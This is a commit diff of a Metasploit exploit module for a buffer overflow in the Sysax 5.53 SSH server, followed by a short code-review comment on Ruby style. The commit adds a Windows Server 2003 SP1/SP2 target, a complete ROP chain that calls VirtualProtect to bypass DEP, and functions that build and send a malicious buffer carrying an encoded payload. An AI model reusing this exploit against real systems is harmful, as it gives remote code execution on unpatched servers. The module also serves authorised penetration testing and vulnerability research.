Add ROP target for Win2k3 SP1 and SP2
This commit is contained in:
parent
29cf8683ee
commit
4b1e67f94f
|
@ -47,9 +47,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
# Win XP SP3 and Win2k3 SP0
|
[
|
||||||
# POP/POP/RET - sysaxservd.exe
|
'Sysax 5.53 on Win XP SP3 / Win2k3 SP0',
|
||||||
['Sysax 5.53 on Win XP SP3 / Win2k3 SP0', {'Ret'=>0x00402669}]
|
{
|
||||||
|
'Rop' => false,
|
||||||
|
'Ret' => 0x00402669 # POP/POP/RET - sysaxservd.exe
|
||||||
|
}
|
||||||
|
],
|
||||||
|
[
|
||||||
|
'Sysax 5.53 on Win2K3 SP1/SP2',
|
||||||
|
{
|
||||||
|
'Rop' => true,
|
||||||
|
'Ret' => 0x0046d23c # ADD ESP, 0F8C # RETN
|
||||||
|
}
|
||||||
|
]
|
||||||
],
|
],
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
'DisclosureDate' => "Feb 27 2012",
|
'DisclosureDate' => "Feb 27 2012",
|
||||||
|
@ -70,16 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def get_regular_exploit
|
||||||
#
|
|
||||||
# Load net/ssh so we can talk the SSH protocol
|
|
||||||
#
|
|
||||||
has_netssh = load_netssh
|
|
||||||
if not has_netssh
|
|
||||||
print_error("You don't have net/ssh installed. Please run gem install net-ssh")
|
|
||||||
return
|
|
||||||
end
|
|
||||||
|
|
||||||
#
|
#
|
||||||
# Align the stack to the beginning of the fixed size payload
|
# Align the stack to the beginning of the fixed size payload
|
||||||
#
|
#
|
||||||
|
@ -115,6 +117,80 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
buf << "\xeb" + [0-align.length-2].pack('c') + make_nops(2) #Short jmp back
|
buf << "\xeb" + [0-align.length-2].pack('c') + make_nops(2) #Short jmp back
|
||||||
buf << [target.ret].pack('V*')
|
buf << [target.ret].pack('V*')
|
||||||
|
|
||||||
|
return buf
|
||||||
|
end
|
||||||
|
|
||||||
|
def get_rop_exploit
|
||||||
|
|
||||||
|
junk = rand_text(4).unpack("L")[0].to_i
|
||||||
|
nop = make_nops(4).unpack("L")[0].to_i
|
||||||
|
|
||||||
|
# !mona rop -m msvcrt
|
||||||
|
p =
|
||||||
|
[
|
||||||
|
0x77bb2563, # POP EAX # RETN
|
||||||
|
0x77ba1114, # <- *&VirtualProtect()
|
||||||
|
0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
|
||||||
|
junk,
|
||||||
|
0x77bb0c86, # XCHG EAX,ESI # RETN
|
||||||
|
0x77bc9801, # POP EBP # RETN
|
||||||
|
0x77be2265, # ptr to 'push esp # ret'
|
||||||
|
0x77bb2563, # POP EAX # RETN
|
||||||
|
0x03C0990F,
|
||||||
|
0x77bdd441, # SUB EAX, 03c0940f
|
||||||
|
0x77bb48d3, # POP EBX, RET
|
||||||
|
0x77bf21e0, # .data
|
||||||
|
0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
|
||||||
|
0x77bbfc02, # POP ECX # RETN
|
||||||
|
0x77bef001, # W pointer (lpOldProtect) (-> ecx)
|
||||||
|
0x77bd8c04, # POP EDI # RETN
|
||||||
|
0x77bd8c05, # ROP NOP (-> edi)
|
||||||
|
0x77bb2563, # POP EAX # RETN
|
||||||
|
0x03c0984f,
|
||||||
|
0x77bdd441, # SUB EAX, 03c0940f
|
||||||
|
0x77bb8285, # XCHG EAX,EDX # RETN
|
||||||
|
0x77bb2563, # POP EAX # RETN
|
||||||
|
nop,
|
||||||
|
0x77be6591, # PUSHAD # ADD AL,0EF # RETN
|
||||||
|
].pack("V*")
|
||||||
|
|
||||||
|
p << payload.encoded
|
||||||
|
|
||||||
|
#
|
||||||
|
# Similar buffer structure to get_regular_exploit
|
||||||
|
#
|
||||||
|
buf = ''
|
||||||
|
buf << rand_text(392, payload_badchars)
|
||||||
|
buf << rand_text(20, payload_badchars)
|
||||||
|
buf << rand_text(1012, payload_badchars)
|
||||||
|
buf << p
|
||||||
|
buf << rand_text(9204-buf.length)
|
||||||
|
buf << rand_text(4, payload_badchars)
|
||||||
|
buf << [target.ret].pack('V*')
|
||||||
|
|
||||||
|
return buf
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
#
|
||||||
|
# Load net/ssh so we can talk the SSH protocol
|
||||||
|
#
|
||||||
|
has_netssh = load_netssh
|
||||||
|
if not has_netssh
|
||||||
|
print_error("You don't have net/ssh installed. Please run gem install net-ssh")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Create buffer based on target (DEP or no DEP)
|
||||||
|
# If possible, we still prefer to use the regular version because it's more stable
|
||||||
|
#
|
||||||
|
if target['Rop']
|
||||||
|
buf = get_rop_exploit
|
||||||
|
else
|
||||||
|
buf = get_regular_exploit
|
||||||
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Send the malicious buffer
|
# Send the malicious buffer
|
||||||
#
|
#
|
||||||
|
@ -149,6 +225,4 @@ end
|
||||||
=begin
|
=begin
|
||||||
Todo: We seriously need a MSF SSH mixin to handle the SSH protocol ourselves, not
|
Todo: We seriously need a MSF SSH mixin to handle the SSH protocol ourselves, not
|
||||||
relying on net/ssh.
|
relying on net/ssh.
|
||||||
|
|
||||||
* Need a reliable stack pivot to rop out, haven't found one
|
|
||||||
=end
|
=end
|
||||||
|
|
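Review bot: In `get_rop_exploit`, `junk` and `nop` are read with the native-endian `unpack("L")[0].to_i` but emitted with the little-endian `pack("V*")`, so the two format letters disagree and the `.to_i` on an Integer is a no-op; `junk = rand_text(4).unpack("V")[0]` and `nop = make_nops(4).unpack("V")[0]` express the same thing consistently with the surrounding packing. The new `exploit` also keeps `if not has_netssh`, where `unless has_netssh` is the idiomatic form, and both new helpers end with an explicit `return buf` that Ruby's implicit return makes unnecessary. Note that `get_regular_exploit` begins in the second hunk and its body continues outside it, so only its tail is visible in the third hunk.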